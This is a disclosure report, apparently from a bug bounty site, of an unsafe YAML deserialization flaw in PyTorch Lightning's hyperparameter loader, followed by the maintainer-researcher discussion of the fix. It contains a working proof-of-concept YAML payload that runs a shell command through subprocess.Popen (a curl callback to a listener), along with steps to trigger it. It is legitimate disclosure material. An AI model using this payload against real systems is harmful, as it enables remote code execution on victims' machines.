Deserialization of Untrusted Data in pytorchlightning/pytorch-lightning

Valid

Reported on

Dec 12th 2021


Description

There is untrusted YAML Deserialization vulnerability on PyTorchLightning Github repository. PyTorchLightning's saving.py (core.saving.load_hparams_from_yaml) functionality is calling "yaml.UnsafeLoader" from pyyaml Python library which is not secure method. Because of that, maliciously crafted yaml config file can cause code execution on the victim's machine.

Proof of Concept

  • Here is the poc.py file:
from pytorch_lightning import core
core.saving.load_hparams_from_yaml("evil.yaml")
  • Here is the evil.yaml file:
- !!python/object/new:yaml.MappingNode
  listitems: !!str '!!python/object/apply:subprocess.Popen [["curl", "127.0.0.1:8080/rce"]]'
  state:
    tag: !!str dummy
    value: !!str dummy
    extend: !!python/name:yaml.unsafe_load
  • After that, you need to start HTTP server on your attacker machine's port 8080. When you run the below command, you will see the HTTP request from the victim host because of the malicious yaml file.
python3 -m http.server 8080
  • Run the poc.py file after that you will see HTTP request from coming the victim host,
python3 poc.py

Impact

Maliciously crafted yaml config file can cause code execution on the victim's machine.

We are processing your report and will contact the pytorchlightning/pytorch-lightning team within 24 hours. 2 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md a month ago
Carlos Mocholí validated this vulnerability a month ago
oivrip has been awarded the disclosure bounty
The fix bounty is now up for grabs
Carlos Mocholí
a month ago

Maintainer


As mentioned in the reference link, is the fix just updating https://github.com/PyTorchLightning/pytorch-lightning/blob/7aee00c679d64ed62c0e119415ac3e02a0e434fb/requirements.txt#L7 to >=5.3.1?

oivrip
a month ago

Researcher


Actually, I don't have very deep knowledge about the pyyaml library, but I would recommend you to update the library to the latest version rather than the 5.3.1 version because as you can see from this link, it is said that there may be some problems in the 5.3.1 version. In addition, the use of UnsafeLoder may also open the door to different deserilization vulnerabilities in the future. For this reason, I can recommend you to examine other pyyaml loader functions such as FullLoader and SafeLoader. As the name suggests, if your application will not cause any incompatibility problems, using "yaml.SafeLoader" after updating the pyyaml library seems like the most guaranteed solution.

oivrip
a month ago

Researcher


Another reference about this subject: https://blog.ankursundara.com/pyyaml-cve/

Carlos Mocholí
a month ago

Maintainer


Okay, thank you! Do you want to open a PR so you get the fix bounty?

oivrip
a month ago

Researcher


Thank you for your offer! You can open a PR.

Carlos Mocholí confirmed that a fix has been merged on 62f1e8 a month ago
The fix bounty has been dropped
saving.py#L347 has been validated